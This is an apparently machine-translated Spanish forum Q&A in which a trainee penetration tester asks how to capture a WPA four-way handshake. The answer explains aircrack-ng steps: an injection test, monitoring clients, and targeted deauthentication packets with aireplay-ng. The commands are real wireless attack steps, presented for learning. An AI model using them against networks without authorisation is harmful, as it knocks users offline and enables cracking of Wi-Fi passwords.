No puedo asegurar un saludo de WPA (saludo de 4 vías)

1

Estoy entrenando para ser un examinador de bolígrafos y tengo algunos problemas para obtener un apretón de manos de 4 vías. Yo uso airodump-ng -c -w file --bssid wlo1 seguido de Aireplay-ng -0 0 -a (Mac) wlo1

Aquí están todos los pasos que sigo:

Ifconfig wlo1
ifconfig wlo1 down
iwconfig wlo1 mode monitor
ifconfig wlo1 up
airmon-ng check wlo1
kill processes

Airodump-ng wlo1
airodump-ng -c (channel) -w (file) --bssid  wlo1 
aireplay-ng -0 0 -a (mac) wlo1

Sé qué hacer después de recibir el apretón de manos, simplemente estoy atascado. Cualquier ayuda sería muy apreciada. Estoy usando Fedora 25

    
pregunta Evan Anderson 27.05.2017 - 03:07
fuente

1 respuesta

2

Primero debes asegurarte de que tu nic pueda inyectarse y que la aplicación objetivo esté dentro del rango.

aireplay-ng -9 wlo1 

Después de ejecutar este comando, debería ver '¡La inyección está funcionando!' y el ap dirigido con una alta tasa de respuesta (50 - 100%)

El ataque de autentificación envía paquetes de disociación a los clientes conectados, por lo que debe tener al menos un cliente asociado.

airodump-ng -c <ap channel> --bssid <ap mac> wlo1 

Debe haber al menos un mac en la pestaña "ESTACIÓN" asociada con la aplicación. Puedes usar este cliente para un ataque dirigido.

aireplay-ng -0 5 -a <ap mac> -c <client mac> wlo1

Es posible que tenga que ejecutar el comando anterior varias veces hasta que reciba un saludo.

Puede aumentar o disminuir la cantidad de paquetes de autenticación. A veces uno es suficiente, a veces toma diez o más.

    
respondido por el t.m.adam 27.05.2017 - 05:26
fuente

Lea otras preguntas en las etiquetas